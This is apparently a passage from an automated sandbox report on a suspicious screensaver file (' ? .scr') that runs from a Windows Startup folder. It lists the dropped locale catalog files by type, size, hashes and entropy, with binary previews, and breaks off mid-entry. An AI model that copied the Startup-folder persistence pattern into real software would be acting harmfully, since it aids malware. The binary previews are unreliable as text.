                                                                                                    Entropy (8bit):4.682024336309442
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:8qds6EECa88ygwgJAor7Jaz+BWTTmcjucHFyBagP6uf2C:8bRonyyJbJazWqTmc6QFy8gP6uf
                                                                                                    MD5:F574AFFBCABDDC89F2EED5E52D2FFF4F
                                                                                                    SHA1:AD33565149D85672E29BF742FF2C4027BF51E2D3
                                                                                                    SHA-256:CC7FBA3E7B5A7CF08E11CE6E5F470CAAAF0EC816E63820999B018FCECAD23EBC
                                                                                                    SHA-512:0E302A04199BBD13A8E33E1EEB2A37CFA31DC9BAA70B962424E1528D8B9F90579EFCCD0BBD995E4389A65512AC5E561DF68DAA2037FD0E14067345F65C6B9631
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................&...............9.......B.......J.......R.......Y......._.......g.......n.......v.......................................................................................................................................).......1.......6.......=.......L.......T.......\.......e.......n...............................................................................................................................................................$......./.......9.......@.......N.......U.......[.......d.......n.......v.......~.......................................................................................................................................................................&.......1.......<.......C.......L.......U.......Z.......`.......k.......v.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10301
                                                                                                    Entropy (8bit):5.097444253016151
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dsuv0JRfltU4WjV9qWxa5hW8sP0amFLIznNw2FsgGvHAqF:mOIRfg4WjVDxa5hW8ramF0DWx
                                                                                                    MD5:6EC6DA61C3753EB202E203F1B56CDAA4
                                                                                                    SHA1:D9F227B80D8C04155FA62EBD73A2E43FBA1221A6
                                                                                                    SHA-256:E3255464F59C4EFB0FB778235C1A3F8A8DC866ACE86A29CC252A296613D40897
                                                                                                    SHA-512:93322F52F4C94FD554237A65491D15A1356D7BDF386BE2B6EAEB4D0C9FF47A1574DB384AF81108D9FA889D959E28C043E1BA7ED3D1F5623C2CF2E53F35DCED02
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganiszt\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24602
                                                                                                    Entropy (8bit):5.168479365948576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosrFvX4KdGoll46nbjz5wsWP48WAINiZGWDgckQ7afREXcSsV:0oUZdpv48fmsWP48WAIEuIaZ3
                                                                                                    MD5:946E48D21265FC19DAD3E4F1B75F64CE
                                                                                                    SHA1:382943CCF47D0300AD4169C5DF1CB47B877C862D
                                                                                                    SHA-256:23A9417E48F281B8F5063D6FAF3BAE1831B800A139477BA3D62423B712CEDCF4
                                                                                                    SHA-512:6B31C78805B48BA0F124519922939566D5FEB61E8E2331207CCD766A7CF9AC3487379A06F74295BFF1ACE476B7A80EF5A956B98F82342A9B105059CCE3642859
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1604 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):68957
                                                                                                    Entropy (8bit):5.078206733863741
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PwoZllAbpbQrIow/9jOFtjHxPeSCN8pPFrNy+xQ1zZEgwTVapejd0zvUhzSt:PwoWb9KRXv9NnQ1zZEgweGd0zvUhzSt
                                                                                                    MD5:D99C2EA20FE77CDD74A33A91146F6C95
                                                                                                    SHA1:08FDA156B76B61575EADBA7AC48E0FB0AEB622AC
                                                                                                    SHA-256:875CF9DFA4468D0871426C7C21F6903B65A9C5F7E3EBEC3062EBEE5ED2BA8DA1
                                                                                                    SHA-512:E688D96AB7B00827459C0663BE9ABDF918BD48EAA60F13DE5E540720A12781CD3EA58580FC8AEF65C48AC48E0CF25D4A79F2E911224EDF543C50DB8B4C08D2E6
                                                                                                    Malicious:false
                                                                                                    Preview:........D.......<2..]...\d........................................................................................".......+.......0.......:.......?.......N.......W......._.......e.......n.......t.......~..........................................................................................................................................$.......+.......8.......>.......D.......L.......V.......k.......w.............................................................................................................%......./.......9.......A.......K.......X.......b.......q...................................................................................................................................%.......+.......6.......>.......E.......L.......U.......e.......}..........................................................................................................................................(.......D.......S.......[.......l.......x...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Brit Antarktiszi Ter\303\274let'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2749
                                                                                                    Entropy (8bit):5.335044800210034
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADmzC+R+avGqIfdvqNuoUZ5gmB90gvYO5HjIehHMu/:qDm7R+ayBolmBvY6
                                                                                                    MD5:22DCFFAA39609275694C6B07101C169A
                                                                                                    SHA1:0C3719344CDAD9DB117A9CEB27340CF12416C301
                                                                                                    SHA-256:E1F02AB756F87D2170EB7C64F23BDDC396C7C1FB067BA497C21CDF7072F0925F
                                                                                                    SHA-512:0008F31A6B444D313B9DE2FCEC1CCE115F6B66500221AF67CFF3624F39C58CDFC6D2FB3AFB89ACE5D5001E0019134E04C97E854117ECF066F9BF6A11891FF665
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........................'.......+.............../...<.......l.......t..................................."...................$.......3.......C.......U.......s.../.......................................3...........#.......0...$...L.......q...(...}................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB elsz\303\241mol\303\241si egys\303\251g'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9822
                                                                                                    Entropy (8bit):5.030419109002505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFkc/RxYj86VRyK0G/2LCntx8ydJhiQ3gOE90Ah/q4u5x:Sac16TL0G/Uo/l29J/qx
                                                                                                    MD5:9A8C561D8BECA7546C0B854DD1E6126A
                                                                                                    SHA1:6FED2B7488276EB48A0F62CDCBE4FBAE5CD48658
                                                                                                    SHA-256:ACB3720DB7746732A00850E781793CD847584A9A884FFB41DB4030D9702B4556
                                                                                                    SHA-512:CF9F5A859E78B7CD92947B4D99C08EA958397AF3748672ED021D472ADB8173F08A1D68C4BEF32035D8720541AF522E0D3D9D539369F64A6383C9DF51AEE1DAFE
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 969 messages, Project-Id-Version: iso_639-3 'abh\303\241z'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37180
                                                                                                    Entropy (8bit):4.664404950074738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:JD4KjBYfc65ospFPUD0iAuqDQMfj8XIcXdLl51eigZKx4:JD4aYRPChAumF89dLl51eigZKi
                                                                                                    MD5:4DEAC5D258EA7772795A69F28024EF2A
                                                                                                    SHA1:476A5F3AAD84845ABEBBF7D97DB70909426B6DB3
                                                                                                    SHA-256:9EE99863EB3EA86DA7EA3CFCC96F7880412684420117C7A7DC24276D22C1A117
                                                                                                    SHA-512:F913BCF7F7999FED69738B2EAF45E4A8C836E835AC9B6C332A152C9E645A199BD265774D315575677FDF68F5E35942CC5D4B76B686FCD5ADB1D1495341F4A164
                                                                                                    Malicious:false
                                                                                                    Preview:................d........<.......P.......P.......P.......Q.......Q.......Q.......Q.......Q......%Q....../Q......6Q......;Q......@Q......IQ......QQ......XQ......aQ......gQ......~Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......Q.......R.......R.......R.......R...... R......'R......2R......:R......@R......IR......OR......TR......\R......hR......rR......{R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......R.......S.......S.......S.......S......$S......-S......5S......=S......IS......VS......eS......oS......wS.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......S.......T.......T.......T.......T.......T......$T......*T......3T......8T......KT......RT......ZT......bT......~T.......T.......T.......T.......T.......T.......T.......T.......T.......T.......T......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'afro\303\241zsiai nyelvek'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7550
                                                                                                    Entropy (8bit):4.914939749854811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2Ti1/PRfYwORSlSE0BfCuXr5VcJHVCvoU0LQvUNt5TlE0F2dlA01S:4SDx0JQwHSE0BfNca/0LtN7imKm
                                                                                                    MD5:AD2B67475B805C2A1D93623FB4EAAA1A
                                                                                                    SHA1:EFA45C5EC211FAE45FA8B64930A9E180BA7A7502
                                                                                                    SHA-256:1A2E410CF5DCC0832040C5419A0235A40DC54A9EA5D23D76C9FAE696FF6F6DC7
                                                                                                    SHA-512:E0342A0673151F17BD3F4B1B75A6F5265DD7103471C378B94481E00A22FCE83BA8EBCA0F0834E7259E900A11665BE47FAAEFC9BF3E283810B6E5307938DD40BC
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................3.......D.......S.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 408 messages, Project-Id-Version: iso_3166-1 '\324\261\326\206\325\262\325\241\325\266\325\275\325\277\325\241\325\266'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30567
                                                                                                    Entropy (8bit):5.1452101820907625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:eAJg2rD6AT/vudo5XvF8jM5wsOP4XLAE1i3KQuTUm7kOVa:eA6fU+dyfOgmsOP4XLAEsuAL
                                                                                                    MD5:C71F95F461505EABF09BA4C1118066E3
                                                                                                    SHA1:5A8B41F96AF8FE5006943D792018EA175AAEC496
                                                                                                    SHA-256:4A0A0A20466A3A226C7E3140566F9411B21B3BC27EE2DF8622C3468B90957427
                                                                                                    SHA-512:D75544C549B22EF96769E5677F5B847EC789AAC9C9A23E11ED9C813B96E11E50006F3612179C72BB9117AD6A4AE5CD194E3DD84B8667E17CF4F0157FA6977BAE
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........("......)"......5"......="......E"......T"......\"......c"......l"......w".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......%#......+#......3#.. ...:#......[#......c#.. ....#.......#.......#.......#.......#.......#.......#.......$......!$......*$......7$......?$......H$......Q$......X$......g$.......$.......$.......$.......$.......$.......$.......$.......$..,....$......%%......-%..%...3%......Y%......f%......q%......y%......~%.......%.......%.......%..%....%..,....%.."....%..*..."&......M&......U&......^&......g&......z&.......&.......&.......&.......&.......&.......&.......&.......&.......&..'....'..$...-'......R'......n'.......'.......'.......'.......'.......'.......'.......'.......'.......(......&(......,(......>(......E(......M(......U(......[(......e(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(..!....(.......)......-)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\324\262\326\200\325\253\325\277\325\241\325\266\325\241\325\257\325\241\325\266 \324\261\325\266\325\277\325\241\326\200\325\257\325\277\325\253\325\257\325\241\325\265\325\253 \325\217\325\241\326\200\325\241\325\256\326\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3474
                                                                                                    Entropy (8bit):5.377783425407572
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADWZtYvGqIfdvqNuoUtHvVNdtQpTbwU3KezuZoW0o:qDGSyBoKHvzdm5X3KezuZoW0o
                                                                                                    MD5:0E1E0FBD0C969F7CD19087639ED39DE0
                                                                                                    SHA1:BBA749941B13D5B2D2A7D336646ADB78F7C37023
                                                                                                    SHA-256:0C57ABC307445D3AEC38ACA45B93FF4A1458913E6C3DE6E1F953C73BAA09774D
                                                                                                    SHA-512:862FED36DE1BD0C3C792D42A9F503B20BD3BBC9DB15BCEF4EBA424EC00B0DA30BA839E034048829FE907CEBACF09FA9CEF5275963D05BA2817CB14B49BC5D5E2
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................:...3...V...n...a.......3...'...n...[..........."...............(.......-...A...V...o...F.......+.......!...9.......[...+...u...........(.......[...........>...$...\...........!.......E.......r.......3...g...G...............r.......'...j........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 139 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8085
                                                                                                    Entropy (8bit):4.938418389011439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Y+nMQTK8Z6pRkJl4CjiqWxa5iW8sInW4b2Eve2xoa+:B+8Z0RkX4Cjaxa5iW8sIndb3vI
                                                                                                    MD5:FFB049767053547C4AA919D16B4937E0
                                                                                                    SHA1:DEC446B1468BB6AB097C79103475160D830F0001
                                                                                                    SHA-256:D4F062572768A46773A827484854FF962E12BD549B72B756B1945FB37C3FF0B1
                                                                                                    SHA-512:7DCB4E83F1F40C129065FD9E5B928C36F447E670A2EBA18A8BA78664B9D69FE8D4DD2F355ACE512F7977244FCEB36ADC332222C02613F466E8A81AAFBCE7C566
                                                                                                    Malicious:false
                                                                                                    Preview:................t...................................?...........................6.......?.......G.......P.......V.......`.......f.......n.......z.......................................................................................................................2.......O.......V.......q.......y...&.......................(.................................../.......7.......I.......^.......i.......p.......x.......~...................................,...................$.......7.......>.......G.......X.......i...........&...............4...........!.......*.......2.......:.......C.......L.......W.......k...................#...........................................................................,.......7.......M......._.......p...........(.......................................".......)...#.......M.......X.......d.......v........................................... ................................... .......,.......9.......A.......Y.......`.......y.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23347
                                                                                                    Entropy (8bit):4.959663984840517
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DzhbCmyQH17+iF/b/Ubjh5wsWP4XdAIzirGUwRwaCgF0AoKh8JMAT7D5:jhZfdCPQH1TF/bItmsWP4XdAIB+NAoKQ
                                                                                                    MD5:3D68B184445CBF04195C33DA06D55F9D
                                                                                                    SHA1:00AD5ABBB8954BD4E4915BE480EB21454663DB7D
                                                                                                    SHA-256:83CAEEA7AAB02CE19075606F74B5F9C0120B9F75EEB7492C3F08627330F953E6
                                                                                                    SHA-512:D58ABB3D1BF088A310FDA751A11AFAD9B97F3F0BA84F5B51F9EF3BB569AC6A6A04B92E0B3519F83C194F51D119C2D07C8981DA179391578E5C4B2E3C3CE04932
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio Antarctic Britannic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2678
                                                                                                    Entropy (8bit):5.087303045527803
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADgaMOZVvGqIfdvqNuoUY5czE/EuckZfySGM8CubPzMui:qDrVyBodw89fFGPQ
                                                                                                    MD5:EE781AEEBD560E1B33B9F50D7D584BFD
                                                                                                    SHA1:8B847020940047A9C5A304303B8A8257B938BA10
                                                                                                    SHA-256:AA10144B0A37C86A6250DA70BB04B332119347EF72177250DA1DDD4E324EE6E4
                                                                                                    SHA-512:AB9F7844B5E5E78BF1AD522C6D28413034EA1F8E10365D63F7E661D2B3790E6D7023C9128BC864F428CF6211384F7F37DB285DE34CECC6151934A9A6933EB77A
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................K...*...j...(...............0...........................(.......6...+...K...#...w...........................................................'... .......H.......a.......u.......|...,....................... ...........#...2.../.......b........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10195
                                                                                                    Entropy (8bit):5.039465036364493
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dB1EWSemMrvKuoltU4WjV9qWxa5hW8rwoxyWQfFef4E+hNU+:X4rM7Kuog4WjVDxa5hW8MNW0ef4E+hN3
                                                                                                    MD5:B284263EFA094BBEB98F62B3C92C48D4
                                                                                                    SHA1:A029C8B09DB8F12CCB2AADD816610E5B2F92305E
                                                                                                    SHA-256:DCB125F7091B08B32DF6894D49DB72C9D143F529793016B6874FE095EC2614D1
                                                                                                    SHA-512:C5ADE3C6BE342F18ADBD7C7CF0BDF1D69827932F2EEA50FFC58F6D0AFEEDA6879A05A65EFFAAA515774CD4E31B5ACBE634E0E728B8D4E5A3F30763A3F13ACC7B
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23086
                                                                                                    Entropy (8bit):4.973209654525753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosypMM/kuSIDy46nbjz5wsWP48WAINiZGKUklQm15TVGArJ:0o9j/kgDy48fmsWP48WAIcUklb5TVGAV
                                                                                                    MD5:D63C9C6305277F1EA9E4B0D6E94024FE
                                                                                                    SHA1:254E7EF74E1B1D0372BDAE436475323ADFD5E323
                                                                                                    SHA-256:D5597229F858219E37D444257578D465790380B014922569A81BBA20C4BD7114
                                                                                                    SHA-512:D3BB9E5FE90033A55EFD0B6F8D7939F513FBB924112CCD1BF31EC28CA05E4604D98B24A759257F843B1AF4DE838184ED2D0D5FEB886DF604B8267A52141F3BF6
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3744 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):159848
                                                                                                    Entropy (8bit):5.260938577754068
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:VCSqFftIXmioPqGe91AlwN7uddUtN//0h+qDmSNCcdfaOu/VNB+23eu:g55k9/04qt2VNY2V
                                                                                                    MD5:B03B8991278243B245F2BAB755720901
                                                                                                    SHA1:918B08A4E158FC739FFAF77AD4BCE631574AC89B
                                                                                                    SHA-256:F0ACCF230B8604A9F4593EA5AC2785F33F06EF266EEDD0C06705CFC261BF2596
                                                                                                    SHA-512:32E5ACDC10DBDCF91E6CA6EF3B1A447A59E27AFEFB61E9F569A397AEA2F468D45140DC782D1DAD018DE7A92883B0AA818B12D3D52984208D36DF29A6DB96B2B1
                                                                                                    Malicious:false
                                                                                                    Preview:.................u.............. 8......!8......&8......,8......48......;8......I8......W8......\8......a8......j8......o8......w8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9...... 9....../9......@9......O9......T9......`9......f9......t9......z9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:......":.......:......>:......I:......U:......c:......l:......x:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;......!;......+;......3;......=;......J;......T;......c;......q;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<......$<......*<......5<......=<......D<......K<......T<......d<......|<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......=.......=.......=......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Wilayah Antartika Inggris'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2702
                                                                                                    Entropy (8bit):5.161399687425485
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3PHzYZUFz/+vGqIfdvqN5CoUCi6A+g4ly61VDdXYL:rLvMCL+yaCoXi6ng45VDJq
                                                                                                    MD5:3A5507CE84CDEC853CFF300DFCD2860A
                                                                                                    SHA1:D7C8482133CBE06F96AFD85CFE8B0427DB67F6F7
                                                                                                    SHA-256:A33C9B92D9640689285D76E47FEBAB1AF12FE37256092C433B555D6BB3BB048C
                                                                                                    SHA-512:FC5357CD7C6BBDE0F89BD010A44F9F6DB38D33F03664D4A65FE9129FEDC60DC1CD42EA349286F4321CA5D7C1D8D26F3AC50A6B21B41BEE9976DA854574CF0C2A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!......."...................;.......[.......c.......p.......|...............................................".......3.......D.......P...'...]........................................... ...........................+... ...6...'...W................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Unit of Account'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9513
                                                                                                    Entropy (8bit):4.93587449931399
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFweHkEvHMU+Rht6VRyK0G/2LCntx/OW77xP4/mftX:S7vH/+7t6TL0G/Uo/mKxP4wB
                                                                                                    MD5:60167232C951E2EC1F35249DA320EA21
                                                                                                    SHA1:24E6AE40E43A6BE4AC401E4314374045FED21ECA
                                                                                                    SHA-256:6D96BF5804C817E2C536F021B1EAB36ED405690E9E6050A5149F515F014232C1
                                                                                                    SHA-512:1CD14F5D49ADC0A1E51E76E278584C38C77C118274E922B6E98440155B947972B4930821001688D6360D13E425BA31C07B7EA0A339A124F40935400C4D11F111
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7077 messages, Project-Id-Version: Indonesian (iso-codes) ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292415
                                                                                                    Entropy (8bit):5.192360893827307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:12+d5j3BKNGbhROlAVt0yd9j6QMYIusu7gAQA:Q+zj3YOTvuQMEDQA
                                                                                                    MD5:66484C35E9FB155A42E19E5C3EE7F164
                                                                                                    SHA1:FC236C996CE69BF11E9ACA8DE88EA9D842C89236
                                                                                                    SHA-256:900A737E501D59DE2DF5E1D4AB5E6225703E1621E227628174BDD56D21B4C8B1
